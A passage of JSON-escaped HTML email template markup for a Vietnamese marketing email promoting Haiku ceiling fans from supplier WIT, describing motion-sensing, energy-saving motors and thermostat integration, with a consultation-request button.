style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #f4f4f4;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f4f4f4;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f4f4f4;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366368130-9kP2jpS.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 63px;\\\" width=\\\"63\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 22px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\"><strong>Gi\\u00e1m S\\u00e1t B\\u1eb1ng C\\u00f4ng Ngh\\u1ec7 Th\\u00f4ng Minh<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 22px 22px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\">B\\u1ea1n qu\\u00ean t\\u1eaft qu\\u1ea1t ho\\u1eb7c \\u0111\\u00e8n. C\\u00f4ng ngh\\u1ec7 SenseME\\u2122 s\\u1eed d\\u1ee5ng c\\u1ea3m bi\\u1ebfn h\\u1ed3ng ngo\\u1ea1i th\\u1ee5 \\u0111\\u1ed9ng s\\u1ebd t\\u1ef1 \\u0111\\u1ed9ng b\\u1eadt\\/t\\u1eaft qu\\u1ea1t, \\u0111\\u00e8n khi b\\u1ea1n r\\u1eddi kh\\u1ecfi ph\\u00f2ng.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366402742-jV0TkYE.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 63px;\\\" width=\\\"63\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 22px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\"><strong>\\u0110\\u1ed9ng C\\u01a1 EC Si\\u00eau Ti\\u1ebft Ki\\u1ec7m \\u0110i\\u1ec7n<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 22px 22px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\">Thi\\u1ebft k\\u1ebf \\u0111\\u1ed9ng c\\u01a1 EC Haiku\\u00ae mang t\\u00ednh \\u0111\\u1ed9t ph\\u00e1 c\\u00f4ng ngh\\u1ec7, kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 g\\u1ea5p 4 l\\u1ea7n theo ti\\u00eau chu\\u1ea9n ENERGY START\\u00ae<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"200\\\" style=\\\"width: 200px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-33p33\\\" style=\\\"max-width: 320px;min-width: 200px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366425358-2AnQ9PF.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 35%;max-width: 63px;\\\" width=\\\"63\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 22px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\"><strong>K\\u1ebft N\\u1ed1i Thi\\u1ebft B\\u1ecb C\\u1ea3m Nhi\\u1ec7t Th\\u00f4ng Minh<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 22px 22px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 190%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%;\\\">Haiku gh\\u00e9p k\\u1ebft n\\u1ed1i v\\u1edbi b\\u1ed9 \\u0111i\\u1ec1u nhi\\u1ec7t Nest Learning\\u2122, Ecobee gi\\u00fap ti\\u1ebft ki\\u1ec7m t\\u1edbi 30% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng n\\u0103m cho h\\u1ec7 \\u0111i\\u1ec1u h\\u00f2a.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f4f4f4;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f4f4f4;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #f4f4f4;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1596366476320-ddd.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 600px;\\\" width=\\\"600\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 44px 22px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; line-height: 190%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%; text-align: center;\\\">Vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng kh\\u00f4ng kh\\u00ed, ho\\u1ea1t \\u0111\\u1ed9ng b\\u1ec1n b\\u1ec9, kh\\u00f4ng ti\\u1ebfng \\u1ed3n - qu\\u1ea1t tr\\u1ea7n v\\u00e0 qu\\u1ea1t th\\u1ed5i s\\u00e0n l\\u1edbn tr\\u1edf th\\u00e0nh xu h\\u01b0\\u1edbng nhi\\u1ec1u gia \\u0111\\u00ecnh Vi\\u1ec7t Nam hi\\u1ec7n nay. Ngo\\u00e0i ra, vi\\u1ec7c s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd t\\u1ea1o gi\\u00f3 t\\u1ef1 nhi\\u00ean v\\u00e0 th\\u00f4ng tho\\u00e1ng \\u0111\\u1ed1i l\\u01b0u kh\\u00f4ng kh\\u00ed ph\\u00e2n b\\u1ed5 \\u0111\\u1ed3ng \\u0111\\u1ec1u c\\u00e1c m\\u00f9a quanh n\\u0103m, ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n c\\u1ef1c k\\u1ef3 hi\\u1ec7u qu\\u1ea3 th\\u1eddi gian s\\u1eed d\\u1ee5ng li\\u00ean t\\u1ee5c. Th\\u00eam v\\u00e0o \\u0111\\u00f3, \\u0111\\u1ec3 th\\u1ed5i s\\u00e0n ho\\u1eb7c mu\\u1ed1n c\\u00f3 lu\\u1ed3ng gi\\u00f3 th\\u1ed5i c\\u00f3 h\\u01b0\\u1edbng m\\u1ea1nh trong m\\u1ed9t kh\\u00f4ng gian l\\u1edbn th\\u00ec \\u0111\\u00e3 c\\u00f3 qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p. L\\u00fac n\\u00e0y b\\u1ea1n c\\u00f3 nhi\\u1ec1u l\\u1ef1a ch\\u1ecdn ki\\u1ec3u d\\u00e1ng qu\\u1ea1t l\\u00e0m m\\u00e1t t\\u1eeb nh\\u00e0 cung c\\u1ea5p WIT - \\u0111\\u01a1n v\\u1ecb cung c\\u1ea5p qu\\u1ea1t ch\\u1ea5t l\\u01b0\\u1ee3ng cao nh\\u1eadp kh\\u1ea9u \\u0111\\u1ed3ng b\\u1ed9 nguy\\u00ean chi\\u1ebfc.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:helvetica,sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:helvetica,sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/quattran.co\\/bai-viet\\/dat-lich-hen\\\" style=\\\"height:47px; v-text-anchor:middle; width:525px;\\\" arcsize=\\\"87%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#54c5cd\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;\\\"><![endif]-->\\r\\n    <a href=\\\"https:\\/\\/quattran.co\\/bai-viet\\/dat-lich-hen\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #54c5cd; border-radius: 41px;-webkit-border-radius: 41px; -moz-border-radius: 41px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 33px;line-height:120%;\\\"><strong>H\\u00c3Y \\u0110\\u1ec2 L\\u1ea0I TH\\u00d4NG TIN, CH\\u00daNG T\\u00d4I S\\u1ebc LI\\u00caN H\\u1ec6 T\\u01af V\\u1ea4N GI\\u00daP B\\u1ea0N<\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n    <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #262c46;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #262c46;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table 